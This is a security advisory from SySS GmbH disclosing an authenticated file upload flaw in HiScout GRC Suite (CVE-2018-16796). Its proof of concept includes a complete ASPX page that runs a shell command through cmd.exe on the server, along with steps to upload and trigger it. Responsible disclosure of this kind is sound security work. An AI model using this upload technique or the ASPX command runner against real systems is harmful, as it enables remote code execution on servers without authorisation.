HiScout GRC Suite File Upload

HiScout GRC Suite versions prior to 3.1.5 suffer from a file upload vulnerability. An authenticated attacker with the permission to edit or add a "WebSiteElement" to the "content" pages is able to upload any file with any file extension to the data directory of the application. This directory is in the web root and the uploaded file is executed on the server if ".aspx" is chosen as the file extension and if the file contains aspx source code. Any commands can be executed with the permissions of the web server user on the server by exploiting this vulnerability.


MD5 | a35fd22828c02d235e1b374dd87de2af

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2018-015
Product: HiScout GRC Suite
Manufacturer: HiScout GmbH
Affected Version(s): < 3.1.5
Tested Version(s): 3.1.3.12
Vulnerability Type: Unrestricted Upload of File with Dangerous Type
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2018-07-26
Solution Date: 2018-09-03
Public Disclosure: 2018-09-12
CVE Reference: CVE-2018-16796
Author of Advisory: Sebastian Auwaerter, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

HiScout GRC Suite is a platform for managing IT governance, risk and
compliance.

The manufacturer describes the various modules of the
product as follows (see [1]):

The HiScout ISM module is geared toward meeting the requirements of the
ISO 27000 series of international standards, and provides a reliable
basis for the information management systems control loop.

The HiScout Grundschutz module fully supports operations toward BSI
standard 100-2. HiScout Grundschutz comes geared to BSI specifications
and can smoothly incorporate existing data from other tools, such as
GSTOOL. The HiScout BCM module is a new generation of BCM tools that can
generate quantifiable benefits even when there is no emergency, and is
therefore not only used to help you to plan for circumstances that will
hopefully never arise.

Due to a missing check of the file extension and the content of uploaded
files in place of an image, HiScout GRC Suite is vulnerable to a remote
code execution vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

An authenticated attacker with the permission to edit or add a
"WebSiteElement" to the "content" pages is able to upload any file
with any file extension to the data directory of the application. This
directory is in the web root and the uploaded file is executed on
the server if ".aspx" is chosen as the file extension and if the file
contains aspx source code. Any commands can be executed with the
permissions of the web server user on the server by exploiting this
vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC)

To reproduce this issue on a German instance of HiScout GRC Suite,
choose "Inhalte" -> "Neu" -> "WebSiteElement" (The english equivalent
is "Content" -> "New" -> "WebSiteElement") and upload the following
file to the file upload on the right-hand side of the "InfoEditor":

filename: whoami.aspx
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<html>
<head>
<title>Code Execution PoC</title>
</head>
<body>
<%
String a = "whoami";
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+ a;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
String s = stmrdr.ReadToEnd();
stmrdr.Close();

Response.Write("<li>");
Response.Write(s);
Response.Write("</li>");
%>
</body>
</html>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Now, either visit the uploaded file by navigating to
http(s)://<vulnerable-server>/<image-directory>/whoami.aspx or open the
page where the newly created "WebSiteElement" is shown and follow the
path of the "image" that is not loaded properly.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to software version to 3.1.5

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-07-25: Vulnerability discovered
2018-07-26: Vulnerability reported to manufacturer
2018-09-03: Patch released by manufacturer
2018-09-12: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for HiScout BCM
https://www.hiscout.com/en/
[2] SySS Security Advisory SYSS-2018-015
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-015.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Auwaerter of SySS
GmbH.

E-Mail: sebastian.auwaerter at syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Auwaerter.asc
Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJbmQCjAAoJEOmjDUji8Ki2BwQP/2uq786EGw1yi9a3TjG5aQK3
HgLjlYajwpjInpA3I9A40C+udGFfmmTRaMxC9jcWGxae8qwDaFG00fjHmRNWEAK6
6cuMFyBScf1DOmT68GqYKQCm27xmU0iYbPUWbnFHKslKnGLfO7Y4WihfeF/YY+uo
+cBtWtrm3QV5y7xCpnLHFT02FHLBC/84mBI9vqag9ipycxau7ekSu1SkmaOgYwXM
yIpLlVLeoOTbJNJLMVGrs5Dwz6lSlZ5EgB5PS9ANyoNdGvJDfp+8fOegniiePlWL
2heLJt0rchKbxKpAUl7bF9ftJAAOxEhk1SH6xsO/8/VKQNCWwJD0n0GLGWViWHQ8
DhVTGP4BKnlniN9yT6S5WVBD5YikylnmRqBhp8SDrcPNO9xwdol6QmeI7+PEuzlq
ILBnypZEhdU92wAwHY4njQ0MrqDR6R70rgBMk8k+Ep1UZjyGZAeVz74O8hg/pFji
uP2hfzc3XXHFiydK2dEkXiqdhm8GW5ZRtdePCbhvwjQ8osyx8KAVc9eejKWe328s
4IQ83DtZ04fWmD8FflqML1Omdw6Gsq6d+bhnwQUOJfAVzbItiHm+ULBt6l4G/mX6
RNf4aWgkc2nCI26GsEeP3yr6PROQAIoO3qGvAM+p/kwdduSPmyszEMskttL4aM/r
gJzmL3W4B24OGK8xigDk
=GwUf
-----END PGP SIGNATURE-----

Related Posts